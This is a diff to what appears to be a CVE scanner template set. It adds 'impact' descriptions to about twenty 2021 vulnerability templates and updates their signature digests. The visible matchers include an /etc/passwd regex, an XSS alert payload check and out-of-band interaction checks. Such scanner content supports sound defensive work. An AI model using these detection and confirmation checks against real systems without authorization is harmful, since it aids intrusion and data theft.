+# digest: 4b0a00483046022100cd52d9ce5894a2296509f4cb44b676a23091da645670cf068e10eb13c4df14cc022100a97592778535113eaa212d16f2148cddd368087864dcc4017c1fb04dc1494111:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml
index 5467e3a716..3a97cf4665 100644
--- a/http/cves/2021/CVE-2021-31602.yaml
+++ b/http/cves/2021/CVE-2021-31602.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: high
   description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server.
   remediation: |
     Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202cfa71b11f919bda14b762594029e65e5d69d7a2bd788bc54652067a0ac1481702206a149c87bdfef3d2132a13f32a900b827da3b1639c5b5f3b442f14518dba875c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f6a26551a456238552f9d3a036ac19112998ff4428a29b461c885f18a531e980022100defcfbfc2d8cdd3b81d7339e4b2fbf5923f4104bcd372dd04b79307009b20e3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml
index 05ff26d5eb..767d74446f 100644
--- a/http/cves/2021/CVE-2021-31682.yaml
+++ b/http/cves/2021/CVE-2021-31682.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741,dhiyaneshDk
   severity: medium
   description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682).
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206e07f7f252d0b328fede914e8050a8dbb44679509027a44e377ada2f8f12005a022100d31bb039506662d5f7c70e2cb21864f52dd5c17084cf7e409940291e98ac43ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022076b8f71432ef675be11fee4d09494a73eedad09557b1357f1d60175783154b7f022022bb569773e9d8513c7f16502f458387c6c8a0a9a9f6868925a7b61ba94f7b53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml
index a7a2435ea1..fa6a7d1fa4 100644
--- a/http/cves/2021/CVE-2021-31755.yaml
+++ b/http/cves/2021/CVE-2021-31755.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Tenda Router AC11  is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.
   remediation: |
     Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).
   reference:
@@ -41,4 +43,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100b5ddfcd4fdc542043c9a69db06841c8e46d0d8a3b8fbe4a4da0b045e53b19a46022100b477673fd0c90f758604cbcf9aed73b2b36da90d768db000bd1b5e6d1c8feb4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f625fd748317dc82e63cc03dbd3a29e012657d990c265b04481def858e9f52cf0220244fde2afe43779cd522529847216ab6e89ebdce4019af224feb7aeed001fbe5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml
index 51a6693404..961a9cee82 100644
--- a/http/cves/2021/CVE-2021-31805.yaml
+++ b/http/cves/2021/CVE-2021-31805.yaml
@@ -5,6 +5,8 @@ info:
   author: taielab
   severity: critical
   description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
+  impact: |
+    Remote code execution
   remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.
   reference:
     - https://cwiki.apache.org/confluence/display/WW/S2-062
@@ -56,4 +58,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 490a0046304402200598d08223fba48a4fc37b4a9aadddeb9e1ee7067211d9dc37850d4b2ea9af0d022072062a931df2cd8809b450cfe1d3f884a8c2f43ddfee73adc124e006aeecf5e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b4c07e0acec8bdea0fca0377a482efe38d2f6c4b7db4c2700ae498d348286df002200a9b856d498caaff4527155fcdf59f36bd3d2686568c7aa94d515704b415ea78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml
index 86bd080ec1..6b47775a9f 100644
--- a/http/cves/2021/CVE-2021-31856.yaml
+++ b/http/cves/2021/CVE-2021-31856.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856).
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b35bd37791ed2560c1c5c6f2aa59aed4549c9b1cff4c82e3c547902a97ee82ee0221009090699d405c571c02befa25af4c23891134b6b8675f2874f07940c3ed7f67d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c672bc85b1309858d4011c7b8d2cc4334b4d0843da017da7a8e611e9a1455398022100927bc9bd9c26ec6e2a3fc90358173d11ef9e0bd91614fe1ff86aca98701b3e82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml
index 4b06cd0d98..def4f41a73 100644
--- a/http/cves/2021/CVE-2021-31862.yaml
+++ b/http/cves/2021/CVE-2021-31862.yaml
@@ -5,6 +5,8 @@ info:
   author: jas37
   severity: medium
   description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
           - '(body == "false <script>alert(document.domain)</script>")'
           - 'status_code == 200'
         condition: and
-# digest: 490a0046304402200e31e1bcbe871185a51f06e08092d339192aeb7d975f1484e3ee37546b40a18902207a8a0b4bfdf2ed0692d2cf0fbc5ef7beed154a3bf2aa8ad38210ed4dbeb898b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203e22ce8aa2635902dd50241f82208781c422e027583209ff9b6b1b1b2a17fa7b022100a55f5ed486c7aa9f12ed41272ac19baa782ac3c3d85069578082d0a7acb07bd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml
index 5d4276eacf..3f0bf5ec92 100644
--- a/http/cves/2021/CVE-2021-32030.yaml
+++ b/http/cves/2021/CVE-2021-32030.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations."
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks.
   remediation: |
     Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030).
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022078a4e0d79636e729c27dcb0ee709b82ece73b120a560c934e2cdfd87246c8b80022063a516dc21a9e243174c8f4f54fe8cee62acec75092a9b0edb3709b2cf5b6310:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e4cecef6216d154b468787950cf4a0b07d24a656529a11bade89936a1abe6a06022100ecc87d97ef6c607abfcca52c35f2658b324ac505bacd8722987b77e0b4922994:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml
index 01504f17b1..c4f7cb7bb9 100644
--- a/http/cves/2021/CVE-2021-32172.yaml
+++ b/http/cves/2021/CVE-2021-32172.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
         regex:
           - '"hash"\:"(.*?)"\,'
         internal: true
-# digest: 490a00463044022042538ce532c22c376cc83a293c286f931cdffc62c818f99ea14e8c3dab436e6f0220655dbc6132f7702d7184eff825ed9d323c19c01471414a07419ffa17925e0347:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a61fc3b91ec98ee6a137f4e77d7929b91cbfeb614d7a8e6ba9e399ca86da517f02201ae8f3c97d742ae24190b3c5df82a1b019d098516e244a035a051a83e5a10058:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml
index 44d754d6ab..668bcd1fb4 100644
--- a/http/cves/2021/CVE-2021-3223.yaml
+++ b/http/cves/2021/CVE-2021-3223.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741,pikpikcu
   severity: high
   description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a0047304502210091ce24c20e9452198485282f988fcede93b574b36fd52b0de41ec4f23bc64169022077745de27ba1b742848e8d9e18dc910f8ce42f14aaaef729ea66626c8875b2ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202f05c3073fffd71886428ab202c024c1c4b8d2fd4effac83c88ed65b6400c50702205462f52cae8e91107f33d9bc38f31c27027117c71447e8e6ea534a66f9c609d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml
index a516a7e9e3..80754f6713 100644
--- a/http/cves/2021/CVE-2021-32305.yaml
+++ b/http/cves/2021/CVE-2021-32305.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022057dbc2f8588ef414c328b375d351a0859a075c953629499773245b8226984944022100e8de486a28c3bf257cdd5499c8cfbbf370d00d3a8db56e08105450c736e61d08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fbf64052d91c82264c93d9be09fed126355e55a706f1fa40bbbc72f01809c96e02201d6f31c114de31cb1b42d3c2c79a0394fb9d9ffeee75c3635d1c165c090f8117:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml
index d5d6726ba0..7899550a8e 100644
--- a/http/cves/2021/CVE-2021-32618.yaml
+++ b/http/cves/2021/CVE-2021-32618.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.
   remediation: |
     Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a004730450220413311d1c9911c1f63b30c9350917abe3f95d2d6208691102a62ed73247bc2bd022100cb82c4a23213e88f5abc237c9c0dae52c07cd559cd13d79f9c24a99a6aed8856:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022034410b823bf4f7aecefdce0008a764f79e75e88aa5ce95961f5c38b9dd59d249022029111f3634f5c66d18ad7aae4364bd1b9103944642a38e6e142138417d2dfaa2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml
index 7883b73e56..01b7f554f5 100644
--- a/http/cves/2021/CVE-2021-32682.yaml
+++ b/http/cves/2021/CVE-2021-32682.yaml
@@ -5,6 +5,8 @@ info:
   author: smaranchand
   severity: critical
   description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication.
   reference:
     - https://smaranchand.com.np/2022/01/organization-vendor-application-security/
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100884424fcffda23ae9b20edd34935eb43d8aac601d4a994abfe015dfa927965cc0221009ded67d6f46cb096c02d94a86a7971ecf1a5d44cd7cbeb5e4d07e20eac2b1d88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d7847a0fe3de170a86aa4392041ba5424d51198dcc07dc1287b1ae5042161d27022013992b8c629f38a1aba6a0624b03226952801f28d8a1b3d4a1fedf83b683b023:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml
index 5c14451e3e..92a084ac9e 100644
--- a/http/cves/2021/CVE-2021-32789.yaml
+++ b/http/cves/2021/CVE-2021-32789.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
   remediation: |
     Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207a99ca3129267116f96948b657007af4cb6b36457cc128256c2389b4fc2e6626022100d345cee075746e0b7c7f81691864082953074793b59fc589aadc2e147e71aa9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cc55da6b77403204cda82bb3046a4499c2c31f5d73630779ebd875192dea939e02204b3250b3c9d7b186b9243f217cd2a2a446298d14811e9cae08c0119bb01a3273:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml
index 6eff9379db..2b30f83196 100644
--- a/http/cves/2021/CVE-2021-32819.yaml
+++ b/http/cves/2021/CVE-2021-32819.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: Wget"
-# digest: 4a0a0047304502204e93592525defbd25741a3e5a5361075f4af46a848ecec3ad66eb5da5c120662022100e50706a532f712648382cc24325bd45635f77eb7f2aaba38aeba06e625590c13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206b4e7926426f079ab5c5a2d6e128728eab0b2d1f44b76e709d924d2f5415d597022065d67e541239508c5654bed16a582dfb06a2817aaaf7b6f105dab2204002a1e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml
index d4b8d5e751..82c3a296f8 100644
--- a/http/cves/2021/CVE-2021-32820.yaml
+++ b/http/cves/2021/CVE-2021-32820.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: high
   description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Update to the latest version of Express-handlebars to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022075b84775ac6b767eea813307d900cdc51d900deb72ca18c25c1a11233f0712bf022100f2aa80be54966eab915ad6ecf8e54c229aa462ef41f7047e927746e4ef36fb67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd7a5db5501ad20bcd3d602af0a1c5625359c267b61ae4c3c1aae74a148fddef02204001ec1c4e127230fda902837af8ed99152639e59d090fe993054200d5ca1640:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml
index fa8f9398bd..4d5714e3cd 100644
--- a/http/cves/2021/CVE-2021-32853.yaml
+++ b/http/cves/2021/CVE-2021-32853.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207990176e1de558864f4f0f225f365703aee30002db7e90668ec7d46eb7216f95022100f3a04476c2e7ebbfe51525304ce7561f01b97b9bae94001b7f21e10b8a57ec84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cec9f2c5687a6bd61e36f666a3f49c11a33759edb8fe8ba5b027bdc5e5822bd60221008636cc4277b437ce5d55ab23ea71914506187ed1fc997b0dfd276fdc802e5d6b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml
index 45d3bc961f..cf744fc8e7 100644
--- a/http/cves/2021/CVE-2021-3293.yaml
+++ b/http/cves/2021/CVE-2021-3293.yaml
@@ -5,6 +5,8 @@ info:
   author: h1ei1
   severity: medium
   description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
+  impact: |
+    An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.
   remediation: |
     Apply the latest patch or upgrade to a version that fixes the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022022a1ac28371ff16457161e9ad7d890d6b4d601af4d2c9f88a58486d3a2ee5d4e022100cad9b43fe73119cc8bdb0adb84202fee9d0d47ae0553d93ee0f9c2393b423155:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d621fa23047a0bb80b799fe89681dc1c5ec8e689c67c34ee7a6cc6b549da0340220797f409db7ed16496c7f745518755595143e6397b3a69034c19eb6bc5d73379f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml
index dd69c6bbea..ecb3de79eb 100644
--- a/http/cves/2021/CVE-2021-3297.yaml
+++ b/http/cves/2021/CVE-2021-3297.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.
   remediation: |
     Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200ec2e7c51afedd12b906aa44c3343bda2572f6ca5bbe358c40cda7e50d0a813202201d2e2980aedbc4748e2b22a9b783ec13c9c46e88303aa1d2c6b2c8d2bbff391a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a3e7761a5c7fabe90453abdb0e9da46910f8755343c2eddfc4559bd84d5d4dda02207af59ca71c9576f456a883afd7ef3101312e185cc123fb85cebd690dfd0b795b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml
index 1abfc59483..a8395d69f9 100644
--- a/http/cves/2021/CVE-2021-33044.yaml
+++ b/http/cves/2021/CVE-2021-33044.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+  impact: |
+    An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
   remediation: |
     Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
         regex:
           - ',"result":true,"session":"([a-z]+)"\}'
         part: body
-# digest: 4a0a00473045022065ad7c2a2e6d90514380e3c94cfac8126765d9faaabdb1ee8e3efb84f1cce36e022100b43e3f859a2ada94f1d101c7a007371111a93f3cd6c4d4a913dbbd818bf0360c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220084645cbbf87aa2bca29c7e953bef7c0b3cfccc17f172532c44420de08c91abb022100fdb6987e3940d7741dcb9047496a4bf0dd057b7abc2921c56f9b8f7ec82c9528:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml
index c279afc37b..e4bf9a8738 100644
--- a/http/cves/2021/CVE-2021-33221.yaml
+++ b/http/cves/2021/CVE-2021-33221.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+  impact: |
+    Successful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access.
   remediation: |
     Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221).
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b03de9145bd1c57ac0da8f9c34fb6deb29d18b8286b370745905f529aa71c4af022100b25d7bf3f34411813150dc257c017d05cdd505e24cc6e2807d2cc318a71549ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e6df65f6bbd222fd44f4c517eda23f4480ad932632b4ceb5b8d2658262ec93f8022100e522b84808e04676822dbf70fc5a98afcf4d744cbaada6f6e776464916f951ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml
index ef087bf596..ebbabdfee8 100644
--- a/http/cves/2021/CVE-2021-33357.yaml
+++ b/http/cves/2021/CVE-2021-33357.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";".
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system.
   remediation: |
     Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         regex:
           - 'GET \/([a-z-]+) HTTP'
         part: interactsh_request
-# digest: 4a0a0047304502204841ee463211e7c343c6bf761eacc5cc0d6343f9d074aa7c89a1edcbfda157840221008e933b9cdf1bc76eef18f42eea4658fc831a2a045b019beaa883433df0acad2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205bf941893caf13cc8848199ed741614bb492563bd3a5ff6baec9fed39f73e881022100ba80a1bdd50e15dc82c77264bf9668f272b4b7b3987671ca568ca5be5afc5d13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml
index e065c8f40e..be25bfe7f0 100644
--- a/http/cves/2021/CVE-2021-33544.yaml
+++ b/http/cves/2021/CVE-2021-33544.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.
   remediation: |
     Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100fbb8790bffc302ba8f7baf6a628c2d3af9ab8205a6efb53d603d3ad5c2524886022100d53af2fc945ddb7a43349b226ce3a5f171278e77e0de6701bd5145bae8d7d5e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220389274a677e4bb8137353a4bbd6a4ee6181c4e9cb116c1c7e251ad24c1ac4c4a0220194cc36a3c45c7c060befe355ef737e414e4b98fdc7aacd6421e6fe650c9eff4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
